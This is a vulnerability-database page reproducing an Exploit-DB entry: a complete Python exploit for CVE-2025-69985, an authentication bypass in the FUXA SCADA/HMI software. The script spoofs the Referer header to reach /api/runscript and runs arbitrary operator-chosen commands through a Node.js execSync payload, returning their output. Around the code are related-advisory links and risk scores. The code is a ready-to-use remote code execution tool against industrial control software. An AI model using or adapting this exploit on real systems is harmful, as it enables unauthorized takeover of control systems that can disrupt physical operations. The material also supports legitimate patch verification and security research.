Lucene search
+L

FUXA 1.2.8 - Authentication Bypass + RCE Exploit

🗓️ 30 Apr 2026 00:00:00Reported by joshuaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 101 Views

FUXA version 1.2.8 has an authentication bypass that enables remote code execution via the /api/runscript endpoint.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Authentication Bypass Using an Alternate Path or Channel in Frangoteam Fuxa
2 May 202612:40
githubexploit
GithubExploit
Exploit for Authentication Bypass Using an Alternate Path or Channel in Frangoteam Fuxa
4 May 202601:17
githubexploit
GithubExploit
Exploit for CVE-2025-69985
25 Feb 202610:12
githubexploit
ATTACKERKB
CVE-2025-69985
24 Feb 202600:00
attackerkb
Circl
CVE-2025-69985
25 Feb 202620:06
circl
CNNVD
FUXA 安全漏洞
24 Feb 202600:00
cnnvd
CVE
CVE-2025-69985
24 Feb 202600:00
cve
Cvelist
CVE-2025-69985
24 Feb 202600:00
cvelist
Github Security Blog
FUXA has JWT Authentication Bypass via HTTP Referer header spoofing
24 Feb 202618:31
github
NVD
CVE-2025-69985
24 Feb 202616:24
nvd
Rows per page
# Exploit Title: FUXA 1.2.8 - Authentication Bypass + RCE Exploit
# Date: 2026-02-25
# Exploit Author: Joshua van der Poll (https://github.com/joshuavanderpoll/)
# Software Link: https://github.com/frangoteam/FUXA/tree/v1.2.8
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA <= 1.2.8
# Tested on: Debian GNU/Linux 12
# CVE : CVE-2025-69985

"""
FUXA ≤ 1.2.8 Authentication Bypass + RCE Exploit
CVE-2025-69985

This Python exploit targets CVE-2025-69985, an authentication bypass in FUXA
(web-based SCADA/HMI software) that allows access to the protected /api/runscript
endpoint even when authentication is enabled.

By sending a crafted JavaScript payload using child_process.execSync, it achieves
full remote command execution with complete stdout capture (no reverse shell needed).

Author: Joshua van der Poll (https://github.com/joshuavanderpoll/CVE-2025-69985)
Created: February 2026
Version: 1.0
License: GNU General Public License v3.0 (GPL-3.0)
Disclaimer: Use responsibly. This is a proof-of-concept for a patched
                 vulnerability (fixed in FUXA > 1.2.8). Do not use against
                 systems you do not own or have explicit permission to test.

Usage:
    python3 exploit.py -u http://target:1881 -c "whoami"
"""

import requests
import argparse
import sys
import urllib3

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Colors
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
CYAN = '\033[96m'
RESET = '\033[0m'

def print_status(msg, color=BLUE, symbol="[*]"):
    print(f"{color}{symbol} {msg}{RESET}")

def print_success(msg):
    print_status(msg, GREEN, "[+]")

def print_warning(msg):
    print_status(msg, YELLOW, "[!]")

def print_error(msg, exc=None):
    print_status(msg, RED, "[-]")
    if exc:
        print(f" → {type(exc).__name__}: {exc}")
        import traceback
        traceback.print_exc(limit=2)

def build_js_payload(command: str) -> str:
    """Build safe Node.js payload with proper escaping"""
    escaped = (command
               .replace('\\', '\\\\')
               .replace('"', '\\"')
               .replace('`', '\\`')
               .replace('\n', '\\n'))
    
    js = f"""const cp = require("child_process");
try {{
    const result = cp.execSync("{escaped}", {{ encoding: "utf8" }});
    return result.toString();
}} catch (err) {{
    return "ERROR: " + err.message +
           (err.stdout ? "\\nSTDOUT: " + err.stdout.toString() : "") +
           (err.stderr ? "\\nSTDERR: " + err.stderr.toString() : "");
}}"""
    return js

def run_command(session, base_url, command):
    print_status(f"Preparing payload → executing: {command}")
   
    js_code = build_js_payload(command)
    payload = {
        "params": {
            "script": {
                "parameters": [],
                "mode": "",
                "id": "exploit",
                "name": "exploit",
                "code": js_code,
                "test": js_code
            },
            "toLogEvent": False
        }
    }

    headers = {
        "Content-Type": "application/json",
        "Referer": f"{base_url}/fuxa"
    }

    print_status("Sending exploit request to /api/runscript ...")
    try:
        resp = session.post(
            f"{base_url}/api/runscript",
            json=payload,
            headers=headers,
            timeout=15,
            verify=False
        )

        print_status(f"Response status: {resp.status_code}", CYAN)

        if resp.status_code == 200:
            output = resp.text.strip()
            print_success("Command executed successfully (CVE-2025-69985 bypass)!")
            print(f"\n{GREEN}=== COMMAND OUTPUT ==={RESET}")
            print(output if output else "(no output)")
            print(f"{GREEN}======================{RESET}\n")
            return True
        else:
            print_error(f"Server returned {resp.status_code}")
            if resp.text.strip():
                print(f"Body preview: {resp.text[:500]}")
            return False

    except requests.exceptions.Timeout:
        print_warning("Request timed out (command may still have executed)")
        return False
    except Exception as e:
        print_error("Request failed", e)
        return False

def exploit_command(base_url, command):
    session = requests.Session()
    session.verify = False

    # Execute command
    success = run_command(session, base_url, command)

    if success:
        print("\n" + "="*70)
        print(f" {GREEN}Exploit completed!.{RESET}")
        print("="*70 + "\n")
    else:
        print_warning("Exploit may require checking target version / network")

def main():
    parser = argparse.ArgumentParser(
        description="FUXA ≤ 1.2.8 Auth Bypass + RCE (CVE-2025-69985)"
    )
    parser.add_argument('-u', '--url', required=True, help="Target URL (http(s)://host:port)")
    parser.add_argument('-c', '--cmd', required=True, help="Command to execute on target")
    args = parser.parse_args()

    base_url = args.url.rstrip('/')

    print(f"\n {BLUE}Target :{RESET} {base_url}")
    print(f" {BLUE}Command:{RESET} {args.cmd}\n")

    try:
        exploit_command(
            base_url=base_url,
            command=args.cmd
        )
    except KeyboardInterrupt:
        print_warning("Interrupted by user")
        sys.exit(2)
    except Exception as e:
        print_error("Unexpected fatal error", e)
        sys.exit(3)

if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Apr 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.19.8
EPSS0.05633
101